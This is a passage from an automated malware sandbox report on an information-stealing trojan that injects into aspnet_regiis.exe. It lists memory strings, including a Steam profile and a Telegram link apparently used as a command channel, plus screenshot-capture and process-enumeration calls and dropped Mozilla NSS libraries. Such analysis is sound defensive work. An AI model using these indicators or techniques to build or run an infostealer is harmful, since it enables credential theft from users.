                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
                          Source: GIEBFH.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                          Source: aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/K
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/market/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: file.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                          Source: aspnet_regiis.exe, 00000003.00000003.1589017924.0000000003187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997804188694-
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869S
                          Source: file.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:57946 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.7:57947 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow

                          System Summary

Source: file.exe Static PE information: section name: 25W~Dos
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D7499B0 GetModuleHandleW,NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CC8B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CC8B8C0 rand_s,NtQueryVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CC8B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CC2F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 004047E8 appears 38 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 00410609 appears 71 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 004104E7 appears 36 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6CC5CBE8 appears 134 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6CC694D0 appears 90 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6D75CF50 appears 33 times
                          Source: file.exeStatic PE information: invalid certificate
                          Source: file.exe, 00000000.00000002.1352729057.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                          Source: file.exe, 00000000.00000000.1331840866.00000000003E4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHusbandPlayerQuinn178Jack.aUuLT vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameHusbandPlayerQuinn178Jack.aUuLT vs file.exe
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exeStatic PE information: Section: 25W~Dos ZLIB complexity 1.0003326908957415
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/26@1/3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC87030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6CC87030
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_004114A5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,3_2_00411807
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user~1\AppData\Local\Temp\delays.tmpJump to behavior
                          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
